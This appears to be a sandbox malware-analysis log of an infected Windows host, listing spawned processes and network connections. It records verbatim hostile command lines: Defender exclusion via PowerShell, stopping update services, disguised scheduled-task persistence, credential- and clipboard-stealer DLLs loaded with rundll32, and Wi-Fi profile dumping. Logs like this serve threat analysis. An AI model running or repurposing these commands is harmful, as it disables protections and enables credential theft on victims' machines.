"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffbb8a446f8,0x7ffbb8a44708,0x7ffbb8a44718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,15176385790214800802,2977233599442229605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10684 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,15176385790214800802,2977233599442229605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5336 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\tM6SC9Xu.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\tM6SC9Xu.exe

C:\Users\Admin\AppData\Local\Temp\86F1.exe

C:\Users\Admin\AppData\Local\Temp\86F1.exe

C:\Users\Admin\AppData\Local\Temp\953A.exe

C:\Users\Admin\AppData\Local\Temp\953A.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\KE7RO4Oi.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\KE7RO4Oi.exe

C:\Users\Admin\AppData\Local\Temp\9B85.exe

C:\Users\Admin\AppData\Local\Temp\9B85.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1JH61ge1.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1JH61ge1.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,15176385790214800802,2977233599442229605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8596 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,15176385790214800802,2977233599442229605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8588 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,15176385790214800802,2977233599442229605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4608 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\A0F4.exe

C:\Users\Admin\AppData\Local\Temp\A0F4.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2mU933lv.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2mU933lv.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 8132 -ip 8132

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 8132 -s 540

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2208,15176385790214800802,2977233599442229605,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5872 /prefetch:8

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x48c 0x4ec

C:\Users\Admin\AppData\Local\Temp\C3FE.exe

C:\Users\Admin\AppData\Local\Temp\C3FE.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2208,15176385790214800802,2977233599442229605,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3320 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\F725.exe

C:\Users\Admin\AppData\Local\Temp\F725.exe

C:\Users\Admin\AppData\Local\Temp\1145.exe

C:\Users\Admin\AppData\Local\Temp\1145.exe

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\281A.exe

C:\Users\Admin\AppData\Local\Temp\281A.exe

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main

C:\Users\Admin\AppData\Local\Temp\40F2.exe

C:\Users\Admin\AppData\Local\Temp\40F2.exe

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\4DB5.exe

C:\Users\Admin\AppData\Local\Temp\4DB5.exe

C:\Users\Admin\AppData\Local\Temp\kos4.exe

"C:\Users\Admin\AppData\Local\Temp\kos4.exe"

C:\Users\Admin\AppData\Local\Temp\5344.exe

C:\Users\Admin\AppData\Local\Temp\5344.exe

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,15176385790214800802,2977233599442229605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7460 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Users\Admin\AppData\Local\Temp\ea7c8244c8\Utsysc.exe

"C:\Users\Admin\AppData\Local\Temp\ea7c8244c8\Utsysc.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\Admin\AppData\Local\Temp\ea7c8244c8\Utsysc.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "Utsysc.exe" /P "Admin:N"&&CACLS "Utsysc.exe" /P "Admin:R" /E&&echo Y|CACLS "..\ea7c8244c8" /P "Admin:N"&&CACLS "..\ea7c8244c8" /P "Admin:R" /E&&Exit

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "Utsysc.exe" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "Utsysc.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\ea7c8244c8" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\ea7c8244c8" /P "Admin:R" /E

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 8816 -ip 8816

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 8816 -s 580

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\465dbc52837d81\cred64.dll, Main

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\465dbc52837d81\clip64.dll, Main

C:\Windows\system32\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\465dbc52837d81\cred64.dll, Main

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffbb8a446f8,0x7ffbb8a44708,0x7ffbb8a44718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\system32\tar.exe

tar.exe -cf "C:\Users\Admin\AppData\Local\Temp\114462139309_Desktop.tar" "C:\Users\Admin\AppData\Local\Temp\_Files_\*.*"

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2204,1360190751395269012,6575183961311347996,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2216 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2204,1360190751395269012,6575183961311347996,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2628 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2204,1360190751395269012,6575183961311347996,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2268 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,1360190751395269012,6575183961311347996,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3348 /prefetch:1

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,1360190751395269012,6575183961311347996,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3360 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,1360190751395269012,6575183961311347996,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4412 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,1360190751395269012,6575183961311347996,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4900 /prefetch:1

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,1360190751395269012,6575183961311347996,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5228 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,1360190751395269012,6575183961311347996,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3372 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,1360190751395269012,6575183961311347996,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4488 /prefetch:1

Network

Country Destination Domain Proto
US 8.8.8.8:53 134.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 254.20.238.8.in-addr.arpa udp
US 8.8.8.8:53 208.194.73.20.in-addr.arpa udp
US 8.8.8.8:53 39.142.81.104.in-addr.arpa udp
RU 193.233.255.73:80 193.233.255.73 tcp
FI 77.91.124.1:80 77.91.124.1 tcp
US 8.8.8.8:53 73.255.233.193.in-addr.arpa udp
US 8.8.8.8:53 1.124.91.77.in-addr.arpa udp
FI 77.91.124.86:19084 tcp
US 8.8.8.8:53 www.facebook.com udp
NL 157.240.201.35:443 www.facebook.com tcp
NL 157.240.201.35:443 www.facebook.com tcp
US 8.8.8.8:53 35.201.240.157.in-addr.arpa udp
US 8.8.8.8:53 accounts.google.com udp
US 8.8.8.8:53 twitter.com udp
US 8.8.8.8:53 steamcommunity.com udp
NL 142.250.179.141:443 accounts.google.com tcp
NL 142.250.179.141:443 accounts.google.com tcp
US 104.244.42.129:443 twitter.com tcp
US 104.244.42.129:443 twitter.com tcp
JP 23.207.106.113:443 steamcommunity.com tcp
JP 23.207.106.113:443 steamcommunity.com tcp
US 8.8.8.8:53 store.steampowered.com udp
US 8.8.8.8:53 141.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 113.106.207.23.in-addr.arpa udp
US 8.8.8.8:53 129.42.244.104.in-addr.arpa udp
US 8.8.8.8:53 www.epicgames.com udp
US 54.84.169.57:443 www.epicgames.com tcp
US 54.84.169.57:443 www.epicgames.com tcp
US 8.8.8.8:53 www.paypal.com udp
US 151.101.1.21:443 www.paypal.com tcp
US 151.101.1.21:443 www.paypal.com tcp
NL 142.250.179.141:443 accounts.google.com udp
US 8.8.8.8:53 21.1.101.151.in-addr.arpa udp
US 8.8.8.8:53 57.169.84.54.in-addr.arpa udp
US 8.8.8.8:53 91.119.177.108.in-addr.arpa udp
US 8.8.8.8:53 147.47.239.18.in-addr.arpa udp
US 8.8.8.8:53 static.xx.fbcdn.net udp
IE 163.70.151.21:443 static.xx.fbcdn.net tcp
IE 163.70.151.21:443 static.xx.fbcdn.net tcp
IE 163.70.151.21:443 static.xx.fbcdn.net tcp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 21.151.70.163.in-addr.arpa udp
US 8.8.8.8:53 abs.twimg.com udp
US 152.199.21.141:443 abs.twimg.com tcp
US 152.199.21.141:443 abs.twimg.com tcp
US 8.8.8.8:53 api.twitter.com udp
US 104.244.42.66:443 api.twitter.com tcp
US 8.8.8.8:53 pbs.twimg.com udp
US 8.8.8.8:53 video.twimg.com udp
US 192.229.233.50:443 pbs.twimg.com tcp
US 8.8.8.8:53 t.co udp
NL 199.232.148.158:443 video.twimg.com tcp
US 104.244.42.5:443 t.co tcp
US 8.8.8.8:53 community.akamai.steamstatic.com udp
US 8.8.8.8:53 i.ytimg.com udp
US 8.8.8.8:53 static-assets-prod.unrealengine.com udp
US 8.8.8.8:53 tracking.epicgames.com udp
US 8.8.8.8:53 www.paypalobjects.com udp
NL 142.250.179.150:443 i.ytimg.com tcp
US 54.82.162.139:443 tracking.epicgames.com tcp
US 18.239.36.105:443 static-assets-prod.unrealengine.com tcp
US 18.239.36.105:443 static-assets-prod.unrealengine.com tcp
US 192.229.221.25:443 www.paypalobjects.com tcp
US 192.229.221.25:443 www.paypalobjects.com tcp
US 192.229.221.25:443 www.paypalobjects.com tcp
US 8.8.8.8:53 141.21.199.152.in-addr.arpa udp
US 8.8.8.8:53 66.42.244.104.in-addr.arpa udp
US 8.8.8.8:53 50.233.229.192.in-addr.arpa udp
US 8.8.8.8:53 5.42.244.104.in-addr.arpa udp
US 8.8.8.8:53 195.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 131.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 150.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 158.148.232.199.in-addr.arpa udp
US 8.8.8.8:53 105.36.239.18.in-addr.arpa udp
US 8.8.8.8:53 25.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 139.162.82.54.in-addr.arpa udp
US 8.8.8.8:53 static.ads-twitter.com udp
NL 199.232.148.157:443 static.ads-twitter.com tcp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 157.148.232.199.in-addr.arpa udp
US 8.8.8.8:53 106.208.58.216.in-addr.arpa udp
US 8.8.8.8:53 196.168.217.172.in-addr.arpa udp
US 8.8.8.8:53 facebook.com udp
IE 163.70.151.35:443 facebook.com tcp
US 8.8.8.8:53 fbcdn.net udp
IE 163.70.151.35:443 fbcdn.net tcp
US 8.8.8.8:53 35.151.70.163.in-addr.arpa udp
FI 77.91.68.29:80 77.91.68.29 tcp
US 8.8.8.8:53 29.68.91.77.in-addr.arpa udp
US 8.8.8.8:53 fbsbx.com udp
US 8.8.8.8:53 play.google.com udp
NL 142.251.36.14:443 play.google.com tcp
NL 142.251.36.14:443 play.google.com udp
US 8.8.8.8:53 google.com udp
US 8.8.8.8:53 google.com udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 2.36.159.162.in-addr.arpa udp
US 8.8.8.8:53 14.36.251.142.in-addr.arpa udp
US 104.244.42.66:443 api.twitter.com tcp
FI 77.91.68.249:80 77.91.68.249 tcp
RU 193.233.255.73:80 193.233.255.73 tcp
US 8.8.8.8:53 249.68.91.77.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 www.facebook.com udp
US 8.8.8.8:53 accounts.google.com udp
US 8.8.8.8:53 store.steampowered.com udp
NL 104.85.0.101:443 store.steampowered.com tcp
NL 104.85.0.101:443 store.steampowered.com tcp
US 8.8.8.8:53 twitter.com udp
US 8.8.8.8:53 101.0.85.104.in-addr.arpa udp
US 8.8.8.8:53 steamcommunity.com udp
US 8.8.8.8:53 www.epicgames.com udp
US 8.8.8.8:53 www.paypal.com udp
US 8.8.8.8:53 www.paypalobjects.com udp
US 192.229.221.25:443 www.paypalobjects.com tcp
US 8.8.8.8:53 community.akamai.steamstatic.com udp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
NL 142.250.179.130:443 googleads.g.doubleclick.net tcp
NL 23.72.252.169:443 community.akamai.steamstatic.com tcp
NL 23.72.252.169:443 community.akamai.steamstatic.com tcp
NL 23.72.252.169:443 community.akamai.steamstatic.com tcp
US 8.8.8.8:53 i.ytimg.com udp
NL 142.250.179.150:443 i.ytimg.com udp
US 8.8.8.8:53 apps.identrust.com udp
US 8.8.8.8:53 130.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 169.252.72.23.in-addr.arpa udp
NL 194.169.175.118:80 194.169.175.118 tcp
NL 88.221.25.153:80 apps.identrust.com tcp
FI 77.91.124.86:19084 tcp
RU 5.42.65.80:80 5.42.65.80 tcp
US 8.8.8.8:53 118.175.169.194.in-addr.arpa udp
US 8.8.8.8:53 153.25.221.88.in-addr.arpa udp
US 8.8.8.8:53 80.65.42.5.in-addr.arpa udp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
BG 171.22.28.239:42359 tcp
US 8.8.8.8:53 pbs.twimg.com udp
US 8.8.8.8:53 api.twitter.com udp
US 8.8.8.8:53 abs.twimg.com udp
US 8.8.8.8:53 t.co udp
US 8.8.8.8:53 video.twimg.com udp
US 8.8.8.8:53 239.28.22.171.in-addr.arpa udp
NL 142.250.179.130:443 googleads.g.doubleclick.net udp
US 8.8.8.8:53 store.akamai.steamstatic.com udp
NL 23.72.252.171:443 store.akamai.steamstatic.com tcp
NL 23.72.252.171:443 store.akamai.steamstatic.com tcp
NL 23.72.252.171:443 store.akamai.steamstatic.com tcp
US 8.8.8.8:53 171.252.72.23.in-addr.arpa udp
NL 23.72.252.169:443 community.akamai.steamstatic.com tcp
NL 23.72.252.169:443 community.akamai.steamstatic.com tcp
NL 23.72.252.169:443 community.akamai.steamstatic.com tcp
US 8.8.8.8:53 www.recaptcha.net udp
NL 172.217.168.227:443 www.recaptcha.net tcp
US 8.8.8.8:53 227.168.217.172.in-addr.arpa udp
US 8.8.8.8:53 sentry.io udp
US 35.186.247.156:443 sentry.io tcp
US 8.8.8.8:53 156.247.186.35.in-addr.arpa udp
US 8.8.8.8:53 static-assets-prod.unrealengine.com udp
US 8.8.8.8:53 i2.ytimg.com udp
US 18.239.36.22:443 static-assets-prod.unrealengine.com tcp
NL 142.250.179.174:443 i2.ytimg.com tcp
US 8.8.8.8:53 22.36.239.18.in-addr.arpa udp
US 8.8.8.8:53 174.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 yt3.ggpht.com udp
NL 142.251.36.1:443 yt3.ggpht.com tcp
NL 142.251.36.1:443 yt3.ggpht.com tcp
NL 142.251.36.1:443 yt3.ggpht.com tcp
NL 142.251.36.1:443 yt3.ggpht.com tcp
NL 142.251.36.1:443 yt3.ggpht.com tcp
NL 142.251.36.1:443 yt3.ggpht.com tcp
FI 77.91.68.29:80 77.91.68.29 tcp
US 8.8.8.8:53 1.36.251.142.in-addr.arpa udp
FI 77.91.124.1:80 77.91.124.1 tcp
FI 77.91.124.86:19084 tcp
FI 77.91.68.29:80 77.91.68.29 tcp
FI 77.91.124.86:19084 tcp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
FI 77.91.124.71:4341 tcp
FI 77.91.124.86:19084 tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 71.124.91.77.in-addr.arpa udp
FI 77.91.68.29:80 77.91.68.29 tcp
BG 171.22.28.213:80 171.22.28.213 tcp
US 8.8.8.8:53 213.28.22.171.in-addr.arpa udp
FI 77.91.68.29:80 77.91.68.29 tcp
NL 194.169.175.235:42691 tcp
IT 185.196.9.171:80 185.196.9.171 tcp
NL 142.250.179.141:443 accounts.google.com udp
US 8.8.8.8:53 171.9.196.185.in-addr.arpa udp
US 149.40.62.171:15666 tcp
US 8.8.8.8:53 171.62.40.149.in-addr.arpa udp
US 8.8.8.8:53 c.paypal.com udp
US 192.55.233.1:443 tcp
US 192.55.233.1:443 tcp
US 8.8.8.8:53 talon-website-prod.ecosec.on.epicgames.com udp
US 8.8.8.8:53 t.paypal.com udp
US 151.101.1.35:443 t.paypal.com tcp
US 104.18.41.136:443 talon-website-prod.ecosec.on.epicgames.com tcp
US 8.8.8.8:53 api.ipify.org udp
US 104.237.62.212:443 api.ipify.org tcp
US 8.8.8.8:53 35.1.101.151.in-addr.arpa udp
US 8.8.8.8:53 136.41.18.104.in-addr.arpa udp
US 8.8.8.8:53 iplogger.com udp
DE 148.251.234.93:443 iplogger.com tcp
NL 172.217.168.227:443 www.recaptcha.net udp
US 194.49.94.11:80 194.49.94.11 tcp
FI 77.91.124.86:19084 tcp
US 8.8.8.8:53 212.62.237.104.in-addr.arpa udp
US 8.8.8.8:53 93.234.251.148.in-addr.arpa udp
US 8.8.8.8:53 11.94.49.194.in-addr.arpa udp
US 8.8.8.8:53 233.38.18.104.in-addr.arpa udp
US 8.8.8.8:53 23.149.64.172.in-addr.arpa udp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
US 8.8.8.8:53 api.ip.sb udp
US 104.26.13.31:443 api.ip.sb tcp
US 8.8.8.8:53 31.13.26.104.in-addr.arpa udp
US 8.8.8.8:53 b.stats.paypal.com udp
US 64.4.245.84:443 b.stats.paypal.com tcp
US 8.8.8.8:53 84.245.4.64.in-addr.arpa udp
US 192.55.233.1:443 tcp
US 8.8.8.8:53 rr5---sn-aigl6ns6.googlevideo.com udp
GB 74.125.105.10:443 rr5---sn-aigl6ns6.googlevideo.com tcp
GB 74.125.105.10:443 rr5---sn-aigl6ns6.googlevideo.com tcp
